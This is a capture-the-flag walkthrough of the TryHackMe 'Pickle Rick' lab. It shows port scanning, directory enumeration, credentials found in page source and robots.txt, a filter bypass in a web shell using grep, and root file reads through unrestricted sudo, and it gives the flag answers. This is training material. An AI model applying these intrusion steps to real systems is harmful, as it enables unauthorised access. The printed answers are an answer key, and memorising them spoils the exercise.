PickleRick

🌐 Website: TryHackMe
🔥 Level: Easy
🖥️ OS: Linux
🔗 Link: PickleRick

❓Question¶

What is the first ingredient that Rick needs?

📋 Walkthrough¶

Let's start doing a simple nmap

┌──(redteam㉿X8623022)-[~/Desktop/tmp]
└─$ nmap --min-rate=10000 -p- 10.10.17.39   
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-21 12:07 CEST
Warning: 10.10.17.39 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.17.39
Host is up (0.15s latency).
Not shown: 52771 closed tcp ports (reset), 12762 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 54.67 seconds

Let's do a nmap with -sC and -sV

nmap --min-rate=10000 -p22,80 -sV -sC 10.10.17.39
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-21 12:09 CEST
Nmap scan report for 10.10.17.39
Host is up (0.61s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 53:0d:67:b7:ed:c3:ab:c5:07:bf:4d:fc:77:1e:45:fb (RSA)
|   256 5f:b0:30:1f:87:37:67:e5:ac:eb:85:a9:a6:19:10:ea (ECDSA)
|_  256 13:06:fc:f2:31:ed:f9:dc:12:ab:0d:01:34:fa:46:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.64 seconds

Let's go on the website. We got this text:

Listen Morty... I need your help, I've turned myself into a pickle again and this time I can't change back!

I need you to *BURRRP*....Morty, logon to my computer and find the last three secret ingredients to finish my pickle-reverse potion. The only problem is, I have no idea what the *BURRRRRRRRP*, password was! Help Morty, Help!

In the source page, we can see a comment:

  <!--

    Note to self, remember username!

    Username: R1ckRul3s

  -->

Let's check robots.txt

Wubbalubbadubdub

Nothing useful. Let's find some endpoint to login in with php extension.

└─$ gobuster dir -u http://10.10.17.39/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php    
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.17.39/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php            (Status: 200) [Size: 882]

There's a login page. Let's try some passwords. After some tries, I found out that the password is Wubbalubbadubdub, founded in robots.txt. There's a web shell. Let's do ls

Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt

Doing Sup3rS3cretPickl3Ingred.txt give this error:

Command disabled to make it hard for future PICKLEEEE RICCCKKKK.

Let's try some tricks. Let's use grep a Sup3rS3cretPickl3Ingred.txt. If there's at least one 'a' character, it will be printed.

Answer

mr. meeseek hair

❓Question¶

What is the second ingredient in Rick’s potion?

📋 Walkthrough¶

Let's explore the file system. I found an home named rick. Let's do ls -la /home/rick

drwxrwxrwx 2 root root 4096 Feb 10  2019 .
drwxr-xr-x 4 root root 4096 Feb 10  2019 ..
-rwxrwxrwx 1 root root   13 Feb 10  2019 second ingredients

There's a file named second ingredients. Let's see it using grep a '/home/rick/second ingredients'.

Answer

1 jerry tear

❓Question¶

What is the second ingredient in Rick’s potion?

📋 Walkthrough¶

Let's see if we can do something with sudo -l

Matching Defaults entries for www-data on ip-10-10-17-39:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-17-39:
    (ALL) NOPASSWD: ALL

What? We can do anything! Let's sudo ls -la /root

total 36
drwx------  4 root root 4096 Jul 11  2024 .
drwxr-xr-x 23 root root 4096 Oct 21 10:02 ..
-rw-------  1 root root  168 Jul 11  2024 .bash_history
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
-rw-r--r--  1 root root  161 Jan  2  2024 .profile
drwx------  2 root root 4096 Feb 10  2019 .ssh
-rw-------  1 root root  702 Jul 11  2024 .viminfo
-rw-r--r--  1 root root   29 Feb 10  2019 3rd.txt
drwxr-xr-x  4 root root 4096 Jul 11  2024 snap

Now let's use the grep trick: sudo grep '' /root/3rd.txt

Answer

3rd ingredients: fleeb juice